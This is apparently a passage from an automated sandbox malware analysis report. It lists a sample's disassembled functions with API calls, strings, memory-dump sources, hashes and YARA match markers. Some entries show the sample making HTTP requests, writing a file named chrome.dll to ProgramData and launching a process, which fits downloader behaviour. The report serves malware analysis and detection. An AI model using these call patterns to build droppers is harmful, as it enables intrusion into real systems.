                                                                                                                                                                                                                                                            • Part of subcall function 00FE5229: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FE52E3
                                                                                                                                                                                                                                                            • Part of subcall function 00FE5229: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00FE5322
                                                                                                                                                                                                                                                            • Part of subcall function 00FE5229: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00FE5352
                                                                                                                                                                                                                                                            • Part of subcall function 00FE5229: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FE535D
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1E6D: GetSystemTime.KERNEL32(?,010157AE,?), ref: 00FF1E9C
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
                                                                                                                                                                                                                                                            • Part of subcall function 00FF2818: CreateFileA.KERNEL32(00FEECA7,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00FEECA7,C:\ProgramData\chrome.dll,?,?,?), ref: 00FF2832
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FF2EAE
                                                                                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,00000000,?,?,010156F8), ref: 00FF2F00
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcpy$Internet$CreateHeapHttpOpenProcessRequestlstrcat$AllocateConnectFileOptionSendSystemTime_memsetlstrlen
                                                                                                                                                                                                                                                          • String ID: .exe
                                                                                                                                                                                                                                                          • API String ID: 2831197775-4119554291
                                                                                                                                                                                                                                                          • Opcode ID: f736704c54b6e485c7fbbd8e01eb9f3e25199857d859f4b837306c14c2f21c5b
                                                                                                                                                                                                                                                          • Instruction ID: 19c29915e3ca14e6a3668009741a3794dbe6afc92daf490158a8329d67e618d1
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f736704c54b6e485c7fbbd8e01eb9f3e25199857d859f4b837306c14c2f21c5b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6414372E0011D6BDB10FBA5EC43AEE7778AF44340F510461FA40B7162DAB96E46ABD1
                                                                                                                                                                                                                                                          Function 6CD6450B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • EncodePointer.KERNEL32(00000000,?), ref: 6CD64530
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: EncodePointer
                                                                                                                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                                                                                                                          • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                                          • Opcode ID: e03aca573bf20ef153f17cef737b28bf9b6b3dd4198d232c17467a32cc1aa8d7
                                                                                                                                                                                                                                                          • Instruction ID: cb64db3ea469a95fc9a0389678cbcf9131c04734e8f15d92277d0ddb20f61c2b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e03aca573bf20ef153f17cef737b28bf9b6b3dd4198d232c17467a32cc1aa8d7
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48414871900109EFCF06CF95C990AEE7BB5FF48308F148159F914A7A61D335DA61DB61
                                                                                                                                                                                                                                                          Function 00FEF141 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Xinvalid_argument_memmovestd::_
                                                                                                                                                                                                                                                          • String ID: string too long
                                                                                                                                                                                                                                                          • API String ID: 256744135-2556327735
                                                                                                                                                                                                                                                          • Opcode ID: 98972d0bebc27751f835e44f1ad9c1485abc588ab2fe3ffb437e5527585f378f
                                                                                                                                                                                                                                                          • Instruction ID: 02c504c7d663c3398c57087a9dcae405afa440b22e4828ffa8ae60ad11f893fc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 98972d0bebc27751f835e44f1ad9c1485abc588ab2fe3ffb437e5527585f378f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0311A371300289EFEB189E2EDC40965B76AEFC5360B14053AF80587285D769ED58E792
                                                                                                                                                                                                                                                          Function 6CD61713 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 6CD61759
                                                                                                                                                                                                                                                          • ___raise_securityfailure.LIBCMT ref: 6CD61841
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                                                                                                                                          • String ID: N{q`
                                                                                                                                                                                                                                                          • API String ID: 3761405300-2042453580
                                                                                                                                                                                                                                                          • Opcode ID: 90d48733773b94320abff2a6a69900ed233adba7f044d9efab823864f896a7d0
                                                                                                                                                                                                                                                          • Instruction ID: 24660644c02062df1d4512ab97af9f1df4f2468fdd52af2562c1a36e66eda327
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 90d48733773b94320abff2a6a69900ed233adba7f044d9efab823864f896a7d0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B021BFF9610204EBFB44DF65D9957A4BBB8BB0A314F12506AE708DB790E7B09581CF2C
                                                                                                                                                                                                                                                          Function 00FF20F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: malloc
                                                                                                                                                                                                                                                          • String ID: image/jpeg
                                                                                                                                                                                                                                                          • API String ID: 2803490479-3785015651
                                                                                                                                                                                                                                                          • Opcode ID: 4bfa610ef88a1f16fab2cfccadcc109891b67616ad616655ec70f5689b02c637
                                                                                                                                                                                                                                                          • Instruction ID: 47c21109e60405645ca888ad1513eebae656186214ce0e4284869fbf113142d8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4bfa610ef88a1f16fab2cfccadcc109891b67616ad616655ec70f5689b02c637
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0311A572D00108FF8B619FA5D9858AF7F79FF41370B21426AFB11A21A0D7719E40AB50
                                                                                                                                                                                                                                                          Function 6CD1AC50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,00000000,?), ref: 6CD52D19
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(SymFromInlineContextW), ref: 6CD52D49
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(SymGetLineFromInlineContextW), ref: 6CD52D7C
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(SymQueryInlineTrace), ref: 6CD52E0A
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          • SymGetLineFromInlineContextW, xrefs: 6CD52D71
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AddressProc$CurrentProcess
                                                                                                                                                                                                                                                          • String ID: SymGetLineFromInlineContextW
                                                                                                                                                                                                                                                          • API String ID: 2190909847-3625368168
                                                                                                                                                                                                                                                          • Opcode ID: cc366ef7d16057b361ec512f437283cd3761102669491c2499915436ec9ffffc
                                                                                                                                                                                                                                                          • Instruction ID: aef62f5f9302929b14e432e5ebe8abd6eb21209d14c1f1a20e9c81a0bb6a5b51
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc366ef7d16057b361ec512f437283cd3761102669491c2499915436ec9ffffc
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4119471B05305EBEF048F59C89468ABBF8EB85354F40852DFD9897760D731E9148BA2
                                                                                                                                                                                                                                                          Function 00FEF54B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 00FEF561
                                                                                                                                                                                                                                                            • Part of subcall function 0100E6E5: std::exception::exception.LIBCMT ref: 0100E6FA
                                                                                                                                                                                                                                                            • Part of subcall function 0100E6E5: __CxxThrowException@8.LIBCMT ref: 0100E70F
                                                                                                                                                                                                                                                            • Part of subcall function 0100E6E5: std::exception::exception.LIBCMT ref: 0100E720
                                                                                                                                                                                                                                                            • Part of subcall function 00FEF45D: std::_Xinvalid_argument.LIBCPMT ref: 00FEF467
                                                                                                                                                                                                                                                          • _memmove.LIBCMT ref: 00FEF5B3
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          • invalid string position, xrefs: 00FEF55C
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                                                                                                                                                                                                          • String ID: invalid string position
                                                                                                                                                                                                                                                          • API String ID: 3404309857-1799206989
                                                                                                                                                                                                                                                          • Opcode ID: aa981d3a24693ea4638fcfcbbba59cadea5004db84cfe9f418f23a1ef205cfdc
                                                                                                                                                                                                                                                          • Instruction ID: 2495ba97433f96a478d6f942e633eb0e609f3186b3cd1f4f9c2c5f84e0172725
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa981d3a24693ea4638fcfcbbba59cadea5004db84cfe9f418f23a1ef205cfdc
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 681104327003409BCF14EF6EDC805697365AF65324B580939F4168F281C370ED54AB92
                                                                                                                                                                                                                                                          Function 00FEF766 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 00FEF775
                                                                                                                                                                                                                                                            • Part of subcall function 0100E6E5: std::exception::exception.LIBCMT ref: 0100E6FA
                                                                                                                                                                                                                                                            • Part of subcall function 0100E6E5: __CxxThrowException@8.LIBCMT ref: 0100E70F
                                                                                                                                                                                                                                                            • Part of subcall function 0100E6E5: std::exception::exception.LIBCMT ref: 0100E720
                                                                                                                                                                                                                                                          • memmove.MSVCRT(00FEF100,00FEF100,C6C68B00,00FEF100,00FEF100,00FEF582,?,?,?,00FEF602,?,?,?,771B0440,?,-00000001), ref: 00FEF7AB
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          • invalid string position, xrefs: 00FEF770
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
